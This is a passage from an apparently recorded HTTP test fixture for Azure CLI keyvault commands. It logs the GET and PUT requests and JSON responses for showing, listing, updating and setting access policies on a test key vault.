ault/vaults/zhoxingtest9393","name":"zhoxingtest9393","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{"hidden-DevTestLabs-LabUId":"6e279161-d008-42b7-90a1-6801fc4bc4ca","CreatedBy":"DevTestLabs"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zhoxing-test/providers/Microsoft.KeyVault/vaults/zhoxingtest9ac53638","name":"zhoxingtest9ac53638","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{"hidden-DevTestLabs-LabUId":"6e279161-d008-42b7-90a1-6801fc4bc4ca","CreatedBy":"DevTestLabs"}}]}' headers: cache-control: - no-cache content-length: - '5021' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:17 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault show Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1190' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:21 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list Connection: - keep-alive ParameterSetName: - -g User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults?api-version=2019-09-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults?api-version=2019-09-01&$skiptoken=Y2xpLXRlc3Qta3YtbWdtdC15dm80M3oy"}' headers: cache-control: - no-cache content-length: - '1489' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:24 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list Connection: - keep-alive ParameterSetName: - -g User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults?api-version=2019-09-01&$skiptoken=Y2xpLXRlc3Qta3YtbWdtdC15dm80M3oy response: body: string: '{"value":[]}' headers: cache-control: - no-cache content-length: - '12' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:24 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault update Connection: - keep-alive ParameterSetName: - -g -n --set User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1190' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:25 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["get", "create", "delete", "list", "update", "import", "backup", "restore", "recover"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["get", "list", "delete", "create", "import", "update", "managecontacts", "getissuers", "listissuers", "setissuers", "deleteissuers", "manageissuers", "recover"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "vaultUri": "https://cli-test-kv-mgmt-000002.vault.azure.net/", "enabledForDeployment": false, "enableSoftDelete": false, "softDeleteRetentionInDays": 90, "enableRbacAuthorization": false}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault update Connection: - keep-alive Content-Length: - '935' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n --set User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1189' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:28 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1198' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault update Connection: - keep-alive ParameterSetName: - -g -n --enable-soft-delete --enabled-for-deployment --enabled-for-disk-encryption --enabled-for-template-deployment --bypass --default-action --retention-days User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":false,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1189' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:30 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["get", "create", "delete", "list", "update", "import", "backup", "restore", "recover"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["get", "list", "delete", "create", "import", "update", "managecontacts", "getissuers", "listissuers", "setissuers", "deleteissuers", "manageissuers", "recover"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "vaultUri": "https://cli-test-kv-mgmt-000002.vault.azure.net/", "enabledForDeployment": true, "enabledForDiskEncryption": true, "enabledForTemplateDeployment": true, "enableSoftDelete": true, "softDeleteRetentionInDays": 17, "enableRbacAuthorization": false, "networkAcls": {"bypass": "AzureServices", "defaultAction": "Deny"}}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault update Connection: - keep-alive Content-Length: - '1074' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n --enable-soft-delete --enabled-for-deployment --enabled-for-disk-encryption --enabled-for-template-deployment --bypass --default-action --retention-days User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1357' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:31 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1198' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault set-policy Connection: - keep-alive ParameterSetName: - -g -n --object-id --key-permissions User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1357' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:35 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "tags": {}, "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["wrapKey", "get"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["get", "list", "delete", "create", "import", "update", "managecontacts", "getissuers", "listissuers", "setissuers", "deleteissuers", "manageissuers", "recover"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "vaultUri": "https://cli-test-kv-mgmt-000002.vault.azure.net/", "enabledForDeployment": true, "enabledForDiskEncryption": true, "enabledForTemplateDeployment": true, "enableSoftDelete": true, "softDeleteRetentionInDays": 17, "enableRbacAuthorization": false, "networkAcls": {"bypass": "AzureServices", "defaultAction": "Deny", "ipRules": [], "virtualNetworkRules": []}}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault set-policy Connection: - keep-alive Content-Length: - '1059' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n --object-id --key-permissions User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["wrapKey","get"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1295' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:35 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault set-policy Connection: - keep-alive ParameterSetName: - -g -n --object-id --key-permissions User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["wrapKey","get"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1295' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:40 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "tags": {}, "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["wrapKey", "get"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["get", "list", "delete", "create", "import", "update", "managecontacts", "getissuers", "listissuers", "setissuers", "deleteissuers", "manageissuers", "recover"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "vaultUri": "https://cli-test-kv-mgmt-000002.vault.azure.net/", "enabledForDeployment": true, "enabledForDiskEncryption": true, "enabledForTemplateDeployment": true, "enableSoftDelete": true, "softDeleteRetentionInDays": 17, "enableRbacAuthorization": false, "networkAcls": {"bypass": "AzureServices", "defaultAction": "Deny", "ipRules": [], "virtualNetworkRules": []}}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault set-policy Connection: - keep-alive Content-Length: - '1059' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n --object-id --key-permissions User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["wrapKey","get"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1295' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:40 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault set-policy Connection: - keep-alive ParameterSetName: - -g -n --object-id --certificate-permissions User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: 